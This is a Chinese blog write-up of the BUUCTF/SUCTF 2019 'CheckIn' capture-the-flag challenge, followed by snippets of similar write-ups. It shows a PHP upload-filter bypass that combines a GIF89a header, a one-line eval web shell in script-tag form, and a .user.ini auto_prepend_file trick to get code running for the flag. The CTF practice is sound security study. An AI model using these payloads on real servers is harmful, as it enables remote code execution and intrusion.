BUUCTF web CheckIn (upload新姿势.user.ini)

最新推荐文章于 2024-06-11 18:30:48 发布
最新推荐文章于 2024-06-11 18:30:48 发布
阅读量692 收藏 2
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42172261/article/details/104467030
版权

一看是文件上传题目,很自信,之前做过upload专题,基本上就那么几种考点。
上传一个1.php试水,果然不行。
在这里插入图片描述
那就看看将小马写在1.jpg文本文件中,用burp改包行不行,结果被检查出来了。
在这里插入图片描述
嗯…应该是会检测文件属性吧,直接把小马写进txt然后该后缀名是不行了。

知识盲区

exif_imagetype:not image! ,是用了 exif_imagetype() 函数对文件格式进行了检查
exif_imagetype() 读取一个图像的第一个字节并检查其签名。

就只能用图片马了。但是图片马需要结合文件包含漏洞才可以用,或者用htaccess设置才可以解析图片中的小马。不管怎么样,至少得把马子传上去,接下来就传图片马。
在这里插入图片描述
过滤还挺狠的,图片中的马子都能检查。

知识盲区

php文件常用标记
<?php ?>
<?php
<% %>
<? ?>
<script language="php"> </script>

修改文件内容<script language="php"> @eval($_POST['chopper']);</script>
在这里插入图片描述到此上传成功,接下来的任务就是让服务器解析文件中的内容。这里用到了 .user.ini

知识盲区
我们都知道php.ini是php的配置信息,其实也可以用.user.ini,它实际上就是一个可以由用户“自定义”的php.ini。
当一个php文件被解析时,如果此目录下有.user.ini文件,就会按照这个文件的配置来执行。

我们就可以在.user.ini中让php文件解析前先把图片马包含进去。auto_prepend_file=a.jpg

为了让他能够绕过图片类型检测,可以在前面加上gif的文件头GIF89a
也就是

GIF89a
auto_prepend_file=a.jpg

其实这里图片马也不一定就是加到图片里,也可以只加文件头

GIF89a
<script language="php">eval($_POST['chopper']);</script>

接下来访问那个上传到的文件的位置的index.php就可以了,或者用菜刀链接,在根目录下有flag。

H4ppyD0g
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF [SUCTF 2019]CheckIn
qq_42158602的博客
02-07 1591
拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功 发现添加图片头文件就可以绕过 GIF89a 上传php文件的时候发现过滤了<? 绕过检测 <script language='php'></script> 构造图片马 GIF89a <script language='php'>eval($_GET['...
koa+mongodb签到系统.zip
08-03
3. 数据库模型:定义Mongoose的Schema,如User Schema和CheckIn Schema,用于映射MongoDB中的集合和文档。 4. 错误处理和日志记录:确保系统在遇到异常时能正确反馈,并记录详细的错误信息以便于调试和维护。 5. API...
BUUCTF_web_CheckIn
silence1_的博客
08-31 2181
BUUCTF_web_CheckIn 题目题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
BUUCTF---web---[SUCTF 2019]CheckIn
2201_75556700的博客
06-11 913
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显。.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)2、上传正常的jpg文件,提示内容不能有<?4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传。5、必须要是图片类型,将一句话木马,添加图片头后再上传。6、上传成功了,但是需要让图片马当成php代码来执行。10、使用系统函数,查看文件根目录,发现flag文件。9、测试,发现文件上传成功。
buuctf WEB checkin1
qq_41696858的博客
09-28 271
这题考的文件上传 经典一句话先试试,回显文件格式不对,把php文件后缀改成jpg格式 第二次回显,显示文件中包含<?,那就把一句话,改成如下形式 <script language='php'>eval($_POST['niaho']);</script> 成功绕过<?匹配,回显不是图片格式,图片头绕过GIF89a 成功上传,下面就是如何上传php文件,或者执行php代码了 经过检测,对于文件类型进行了严格的过滤,改后缀肯定不行 经过检测,可以上传.user.ini文件(
BUUCTF WEB [SUCTF 2019]CheckIn
Y1da的博客
04-17 306
BUUCTF WEB [SUCTF 2019]CheckIn .user.ini文件 PHP 支持基于每个目录的 INI 文件配置。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 427
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
quartz 2.3数据库设计.doc
最新发布
07-26
- `LAST_CHECKIN_TIME`:最后一次检查时间。 - `CHECKIN_INTERVAL`:检查间隔。 ##### 6. **qrtz_locks** - **表用途**:存储非乐观锁信息,用于实现调度器之间的互斥操作。 - **字段说明**: - `SCHED_NAME`:...
hackny-checkin:基于my.mlh.io的Android hackathon签到应用示例
05-17
【标题】"hackny-checkin" 是一个基于my.mlh.io平台开发的Android应用程序,它专为黑客马拉松(hackathon)设计,用于参赛者的签到流程。这个项目展示了如何利用Android技术来创建一个实用的现场活动管理工具。 ...
delphi7 dent.slip文件
07-17
3. **命令模板**:源码控制系统的操作通常由一系列命令组成,`dent.slip` 文件会定义这些命令的模板,比如执行 "checkin" 操作或 "checkout" 操作的命令字符串。 4. **扩展属性**:某些源码控制系统可能需要额外的...
daily_checkin.zip
01-07
【标题】"daily_checkin.zip" 是一个包含脚本的压缩包,用于自动完成天翼云的每日签到任务,并且据描述在2022年1月7日时已经经过了测试,证明是可用的。这个压缩包可能对那些需要定期在天翼云平台签到并领取额外存储...
BUUCTF-CheckIn
m0_47571887的博客
11-09 790
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 328
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
[BUUCTF]CheckIn (writeup)
weixin_63306244的博客
06-22 171
因为.user.ini是将a.png放到index.php文件的顶部进行执行。回显:exif_imagetype:not image!蚁剑后面的文件是index.php并不是a.png。所以要访问的是index.php。看到这个后就可以直接上蚁剑了。进入后看到是一道上传题。那就只剩下最后一种办法。随后看看了之前用过的。
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1150
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了姿势,这次利用到的知识点也刷了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
BUUCTF-[SUCTF 2019]CheckIn
m0_61361405的博客
10-10 124
`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!13. `if (!`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。
BUUCTF [web专项28][SUCTF 2019]CheckIn
yanglinchiji的博客
11-06 94
想到前面做过一道上传题,上传图片后用.htaccess文件修改上传目录的指定文件后缀。到底还是没有理解出来个所以然,应该是后台检测到该后缀自动删除之类的?成功后修改一下1.jpg再次上传(命令输出flag)看了别人的,发现别人用.user.ini来操作。我也不晓得了,如果有大佬知道请教教我!发现错误,再次上传,但是修改类型建一个.htaccess文件。我们再上传一次图片获取上传目录。先把phtml后缀改为jpg。进入后发现是个上传文件的题。上传成功后,进入所给的目录。先上传phtml后缀试试。
BUUCTF】[SUCTF 2019]CheckIn
aoao331198的博客
04-09 492
废话不多讲,老生常谈的文件上传题目 需要传一个图片马 GIF89a <script language='php'>@eval($_POST['abc']);</script> 还有一个.user.ini文件 文件上传之.user.ini GIF89a auto_prepend_file=upload.jpg 作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。 蚁剑链接 http://c8a6d5ca-0f52-4c27-a06f-
ItemRevision.checkin()怎么使用
08-11
ItemRevision.checkin() 是一个 Python 函数,它可能属于一个更大的程序或库。使用这个函数的具体方法取决于它的实现和上下文,您可以查看相关文档和代码以了解详情。 如果您有更具体的问题,请提供更多信息,以便...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H4ppyD0g

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值